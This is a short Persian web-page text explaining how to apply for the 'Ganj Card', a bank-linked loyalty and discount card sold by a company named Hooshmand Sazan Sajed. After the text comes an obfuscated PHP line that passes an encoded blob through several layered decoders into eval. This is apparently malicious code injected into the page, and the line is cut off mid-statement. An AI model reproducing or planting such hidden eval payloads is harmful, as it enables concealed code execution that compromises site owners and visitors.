نحوه دریافت گنج کارت

مـتقاضیان مـحترم مـیتوانند بـا مراجعه به ســایت،  دفاتر نمایندگی  و یا نمایندگان محترم که دارای  کـارت شـناسایی شرکت هـوشمند سـازان سـاجد  مـی باشد پـس از تـکمیل نمودن فـرم مربوطه و  واریـز مـبلغ حـق عضویت جهت خـرید یـا فعال نمودن کـارت بـانکی خود اقدام به عضویت در اولین باشگاه وفاداری و تخفیف هوشمند بـانکی در ایران نمایند.

eval(gzuncompress(gzinflate(convert_uudecode(str_rot13(base64_decode(urldecode("WmA2JGBUQl1LVCRaLUZZTjc0Kz8xM1xRWVlILkpMQSgkYDBQKTY5MTo2KVY5UiFXP1RMPjxXVyIxUVJTNApaUkxPO1dXJDAnXl9TTT4sOidNXkBXOiJUVSpNPzYlRTw2UipZN0hNMFFMVztUTT03USUmQFhTUi1QQFMpCiw%2BPDdSVzQ1MGBDIUdTMkNLCmAK"